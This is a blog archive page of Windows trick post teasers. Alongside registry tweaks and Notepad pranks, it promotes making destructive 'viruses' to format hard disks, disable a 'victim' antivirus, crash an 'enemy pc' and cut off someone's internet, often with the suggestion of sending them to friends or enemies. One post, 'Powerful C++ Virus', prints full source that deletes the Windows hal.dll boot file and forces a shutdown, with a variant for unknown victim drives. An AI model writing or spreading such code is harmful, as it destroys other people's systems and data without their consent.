Posts

Showing posts from January, 2015

How to change the mouse pointer (cursor) in blogger

Image
I love blogger because it provides an awesome support to edit and customize the templates of blogs hosted on it. By adding new codes, we can make cool changes in our blogs and can make them look better. In this post, I'll tell you a simple method to change the mouse pointer in blogger blogs, means whenever anyone opens your blog, he will see that his mouse pointer looks different while surfing your blog pages. So, lets start the tutorial on changing the mouse pointer in blogger blogs:

How to hide your Hard Disk Drive Partitions

Image
At first open the run window by pressing “ winkey + R ” or go to start and click run then type regedit and hit enter.

How to disable the recent document history on your computer

At first open the Registry Editor by pressing “windows + R” then  type “regedit” and then hit enter. (Select Start/Run, type regedit, and click OK). Now go to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”. And then Create a NoRecentDocsHistory D_WORD key [Right Click® New ®DWORD (32- Bit) Value] . Double-click the value to open it once it is created. Set the Data Value to 1 to enable the restriction with hexadecimal. Click OK and close the Registry Editor. You'll need to restart the computer for the change to take effect. Note: If you want to enable recent document then go to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”. and delete “NoRecentDocsHistory” file that you have create and restart your computer.

Make Personal Log-Book Using Notepad

Do you know that you can use your Notepad as a simple digital diary or a personal Log-Book to keep record of your daily work instead of using boring pen and book ? Well, if you dont know then follow the below mentioned steps to make one for yourself !

WRITE NAME ON YOUR PC CLOCK

1.Go to Control Panel 2.Open Regional and Language Options. 3.Click on ADDITIONAL SETTING , in new window. 4.Go to TIME tab (located on the upper side). 5.Go to the AM symbol and type your name after the “AM”. Do the same on the PM symbol. 6.That’s all. Now, click OK and it’s done. You will see that AM & PM change with what name you give.

Secretly Hide Any File Inside JPG Image File

Image
Few months ago , USA Today story claimed that al-Qaeda operatives were sending out encrypted messages by hiding them inside digital photographs [jpg files] on eBay.

How to format a USB key from the command prompt

It a old style to format pen drive. It is used in DOS Operating System to format.

See Hidden Files & Folders With Command Prompt

To see all hidden file using command prompt

How to create Undeletable and Unrenemable folder?

Image
In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below. Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

Increase RAM speed using Notepad

Simple Trick to increase speed of RAM

Hit Enter Key Continuously

Amazing trick to press enter continuously without touching keyboard enter key

Hit Backspace Key Continuously

Simple trick to press backspace continuously

Ghost Typing On Notepad

Hey guys , Today I am going to share with you a Short but Cool Notepad Trick. People Use notepad to type and save some important or regular information, But very less people know that there is much more that we can do with Notepad. What if i say that we can make Notepad to type automatically what ever we wish to…. Unreal ? Yes it is possible and you will be doing it by yourself in just a few moments.You can show it to your friends and surprise them. Basically it is a prank that you can do with anyone just for fun.

Hide Drives from Your Computer in Windows 7 or Vista

Image
If you’ve got drives in My Computer that you never access, such as a USB Flash drive that you are using solely for ReadyBoost, a floppy drive, or a network drive only used for a particular piece of software, then you might want to simply hide the drive from your computer.

Hide Files or Folders Using Command Prompt

You have a folder named " photos " and this folder is stored in (Disk Drive D). You think that it should not be seen by strangers who use your PC.

Ноw tо Hide Drives with CMD ?

Step 1. Сlісk оn Start – Run , if you are Using Windows 8, Then Click on start and search for Run, or just hold down windows key and press  ” R “. Step 2. Run bох will appear, kіndly type ” сmd ” аnd hіt Еntеr.

How to Enable and Disable Write Protection on USB Flash Drive Using Command Prompt

Welcome back Computerlearningz viewer Today I am going to share  How to Enable and Disable Write Protection on USB Flash Drive Using Command Prompt

HOW TO CHECK YOUR ANTIVIRUS IS REAL OR FAKE

Some people make the mistake of thinking that antivirus programs are fake when they come up with false alarms during their scans. This is simply not true because of what I stated above. So, how do we detect what constitutes a scammy or fake antivirus?

How To Erase Windows

Do not try. This trick can delete your windows

How To Disable Hard Disk Of A Computer or Laptop

Trick to disable harddisk of a computer or a laptop

How To Create a Nameless Folder

Step 1>> Right Click On Desktop Step 2>> Create A New Folder. Step 3>> Rename It Press Key (ALT+0160 )And Then Press Enter Step 4>> Right Click on the folder & Click on Properties Step 5>> Go to Customize & Select Change Icon Step 6>> Select the blank icon & click Ok

How To Freeze A Computer Or Laptop Using Notepad

Dear computerlearningz reader today i will teach you how to freeze a computer or a laptop using notepad

Trojon Horse Code

A Trojan horse, or Trojan, in computing is a generally non-self-replicating type of malware program containing malicious code that, when executed, carries out actions determined by the nature of the Trojan, typically causing loss or theft of data, and possible system harm. The term is derived from the story of the wooden horse used to trick defenders of Troy into taking concealed warriors into their city in ancient Anatolia, because computer Trojans often employ a form of social engineering, presenting themselves as routine, useful, or interesting in order to persuade victims to install them on their computers.

F!le eXTenS!oN CorrUPT!nG V!rUs

Effect –>  Effects file execution, irritating but not destructive. Will Corrupt file working. Coding Platform –>  Batch Programming. Working –>  On executing this code will affects the opening of file and will corrupt the files extension. This will corrupt the file and disables it and you will not be able to execute it in proper format.

Powerful C++ Virus

Hi friends! These are some powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again. Warning: Do not try this on your home computer The Original Code: Code: # include # include using namespace std; int main(int argc, char *argv[]) { std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME system(“shutdown -s -r”); system(“PAUSE”); return EXIT_SUCCESS; } A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is: Code: # include # include using namespace std; int main(int argc, char *argv[]) { std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME system(“shutdown -s -r”); system(“PAUSE”); return EXIT_SUCCESS; } The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

How to create a virus that deactivates an OS

Here are the stepts you should follow to make the virus: This virus will stop and prevent a computer from starting up and the only solution would be to reinstall winsows.

How to Make Trojan Virus Using Notepad

Create trojan horse virus in notepad

HOW TO MAKE +1000 FOLDER IN YOUR PC

You can call it Virus but it is not harmful for your computer. It will really make your friends fool so just follow below steps to make this trick working. This trick is working in windows.

How To Make a Worm Virus

If u want to make worm virus u have to be careful because it is fast so when you make it have to but it in side a folder that have nothing else so let's start

How to create a Highly Dangerous Virus

Create a highly dangerous virus to destroy our computer

How to create a computer virus?

You might be scared of viruses in your computer or laptop. They directly affect the working of the computer systems. You may want to create your own virus too. This guide will show you how you can create a simple virus.

Disable Internet Permanently

Simple trick to disable your internet connect permanently

Delete Key Registry Files

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Dancing Keyboard Led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

Creating a Highly Dangerous Virus Using Notepad

Ever thought of making a virus that can destroy the computer ??? Of course yes , Here I give you instructions of making a SERIOUSLY DANGEROUS computer virus using notepad.

Create a Shortcut to lock your Computer

Have you ever left your PC in a hurry? Have you ever felt that it is a pain to lock your system in the simple way by doing CTRL+ALT+DEL? I would imagine that you have and then, this trick is for you. This trick enables you to create a shortcut to lock your computer instead of doing the regular CTRL+ALT+DEL, thus providing you a way to quickly and easily get away from your PC whenever you are in a hurry.

Create Your own Pen drive virus

You can make your own pen drive virus. Take all risks your self. This is a simple virus created in MS Dos. This virus save in your pen drive. The system will shutdown when open the pen drive. And after the booting the system shutdown when open each drives of your system. So take all risks your self.

Create Binary Virus To Format Hard Disk

Today I will show you to make a virus to format Hard disk using binary code. You can send this file to your friend or enemy to format their Hard disk. But please don't try this on your own computer or else you will end up formatting your own computer.

Make your Computer Welcome You

Do you watch movies? Have you always loved the way how Computers in movies welcome their users by calling out their names? I bet that you too would want to know how you can achieve similar results on your PC and have a computer said welcome.  Then you are at the right place, this article describes exactly how you can make your computer welcome you like this.

How to Convert Text to Audio or Speech Using Notepad and Online

Image
Have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.

Continuously eject CD/DVD drives

Image
This VBS trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again.

How To Disable Victim Antivirus

Welcome back Computerlearningz viewer Today I am going to share a simple trick to disable others anti-virus

Time Bomb Virus

Welcome back Computerlearningz viewer Today I am going to share how this virus is like a time bomb this start when the programmer wrote date & time

Virus Creation

Welcome back Computerlearningz viewer Today I am going to share how to create a virus which can highly dangerous for your pc

This Will Crash Our Computer

Welcome back Computerlearningz viewer Today I am going to share how to crash your enemy pc with just a single file

Shutdowns Computer Everytime It Is Turned On

Welcome back Computerlearningz viewer to I am going to share how to Shutdowns Computer Everytime It Is Turned On.

SHUT UR INTERNET PERMENANTLY

This is a slightly more advanced one. It shuts down your internet permanately. I tried it on myself accidently, i knew what it did, and it still took me a couple of days to get my internet back. works best on XP, not tested on vista or 7.

Mouse Virus

Image
THE BELOW CODE IS NOT A VIRUS,ITS A REDESIGN SHORTCUT FOR ACCESSING AND DELETING THE REGEDIT FILES.MANY ANTIVIRUS WILL DETECT IT AS VIRUS,BUT DON'T WORRY,IT WILL JUST DELETE THE MOUSE FROM THE OPERATING SYSTEM ON WHICH IT IS EXECUTED.

How To Create A Matrix Effect In Your Computer Using Notepad

Image
In most of the movies, you might have seen lots of numbers moving up-down on the screens of the computers of the hackers. This effect is called matrix. I am going to tell you a simple way to create matrix for you just by using notepad.

MAKING MOST DANGEROUS VIRUS CALLED MATRIX

Warning - Do not run it on your computer I'm gonna teach you how to make a virus named Matrix...

Make your own USB Virus

Welcome Back Computerlearningz viewer Today I am going to share how to make your own USB virus

THRETEN BY MAKING SCREEN FLASH 1

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it,

How to crash a PC Forever

This tricks crach a pc forever

How to stop someone's internet access

They're IP address will be lost, & therefore they won't be able to fix it.